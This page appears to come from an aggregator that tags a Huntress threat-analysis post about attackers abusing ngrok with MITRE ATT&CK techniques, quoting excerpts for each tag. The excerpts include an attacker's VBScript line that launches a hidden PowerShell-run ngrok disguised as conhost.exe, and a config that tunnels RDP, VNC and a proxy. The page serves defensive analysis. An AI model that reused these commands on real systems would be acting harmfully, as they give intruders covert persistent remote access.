TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Abusing Ngrok: Hackers at the End of the Tunnel | Huntress

2021-03-16 · Read original ↗

ATT&CK techniques detected

15 predictions
T1059.001PowerShell
100%
". shell " ) command = " powershell - windowstyle hidden c : \ programdata \ windnt \ conhost. exe start - - config = c : \ programdata \ windnt \ ngrok. yml - - all - - region = eu " objshell. run command, 0set objshell = nothing this is a visual basic script — code that will nat…"
T1572Protocol Tunneling
97%
"internet ( including those programmer buddies i mentioned! ) can access this site. checking back at the ngrok output : very cool! we can see the requests that came in and the number of connections. now i can stop ngrok, and that will tear down the tunnel — that public endpoint no…"
T1572Protocol Tunneling
96%
"abusing ngrok : hackers at the end of the tunnel | huntress do you know that expression, “ light at the end of the tunnel? ” usually, that has a positive connotation. after some hard work or persevering through something difficult or unpleasant, you can see " the light at the end…"
T1547.001Registry Run Keys / Startup Folder
95%
"heavy ” compared to some of the simple techniques they could have used, but hey — a graphical interface to keep hacking away on their target? i ’ m sure they won ’ t turn that down. while we found that persistent vbscript code, we also found a vnc server “ winvnc. exe ” ( that is…"
T1219Remote Access Tools
85%
"or any open access to any graphical interface remote control could be devastating to an organization. in this case, hackers use it for persistence, but can also weaponize this to continue their campaign, exfiltrate data, potentially perform more lateral movement and more. it is, …"
T1021.001Remote Desktop Protocol
73%
"or any open access to any graphical interface remote control could be devastating to an organization. in this case, hackers use it for persistence, but can also weaponize this to continue their campaign, exfiltrate data, potentially perform more lateral movement and more. it is, …"
T1572Protocol Tunneling
73%
"tunnel. ” that ’ s why at huntress, we hunt. it ’ s vital to know this tradecraft and understand these tactics, so we can better detect and prevent incidents like this... before hackers are the ones at the other end of the pipe. faqs what is ngrok and how does it work? ngrok is a…"
T1572Protocol Tunneling
65%
", though — where are those supplied? well, we will have to dive into that configuration file it mentioned! malicious ngrok configuration file tunnels : rdp : proto : tcp addr : 3389 wnc : proto : tcp addr : 6300 mobil : proto : tcp addr : 3128 ( the configuration file also includ…"
T1021.001Remote Desktop Protocol
60%
"have already compromised this target. if rdp wasn ’ t enough, they double it up with a tunnel to access vnc ( virtual network computer ), which offers practically the same functionality as rdp. graphical desktop sharing — so the hackers can take advantage of this remote access th…"
T1572Protocol Tunneling
46%
"= 0idletimeout = 0enablejapinput = 0querysetting = 2querytimeout = 10queryaccept = 0locksetting = 0removewallpaper = 0removeeffects = 0removefontsmoothing = 0removeaero = 0debugmode = 0avilog = 0path = c : \ users \ admin \ desktop \ rddebuglevel = 0allowloopback = 1loopbackonly …"
T1572Protocol Tunneling
44%
"##ware strains that incorporate ngrok in their attack chain. huntress can help protect your organization from ngrok exploitation. get a free demo to see huntress in action."
T1090.002External Proxy
43%
"using ngrok to send users to a malicious site under the guise of a legitimate url ), command and control, or data exfiltration by forwarding data through the secure tunnel. what are the signs that ngrok has been hacked? while end users won ’ t often see malicious tampering with t…"
T1090Proxy
37%
"using ngrok to send users to a malicious site under the guise of a legitimate url ), command and control, or data exfiltration by forwarding data through the secure tunnel. what are the signs that ngrok has been hacked? while end users won ’ t often see malicious tampering with t…"
T1090.001Internal Proxy
35%
"abusing ngrok : hackers at the end of the tunnel | huntress do you know that expression, “ light at the end of the tunnel? ” usually, that has a positive connotation. after some hard work or persevering through something difficult or unpleasant, you can see " the light at the end…"
T1090Proxy
33%
"tunnel. ” that ’ s why at huntress, we hunt. it ’ s vital to know this tradecraft and understand these tactics, so we can better detect and prevent incidents like this... before hackers are the ones at the other end of the pipe. faqs what is ngrok and how does it work? ngrok is a…"

Summary

At the end of this tunnel, we find some shady hackers using ngrok to gain remote control access to victim networks.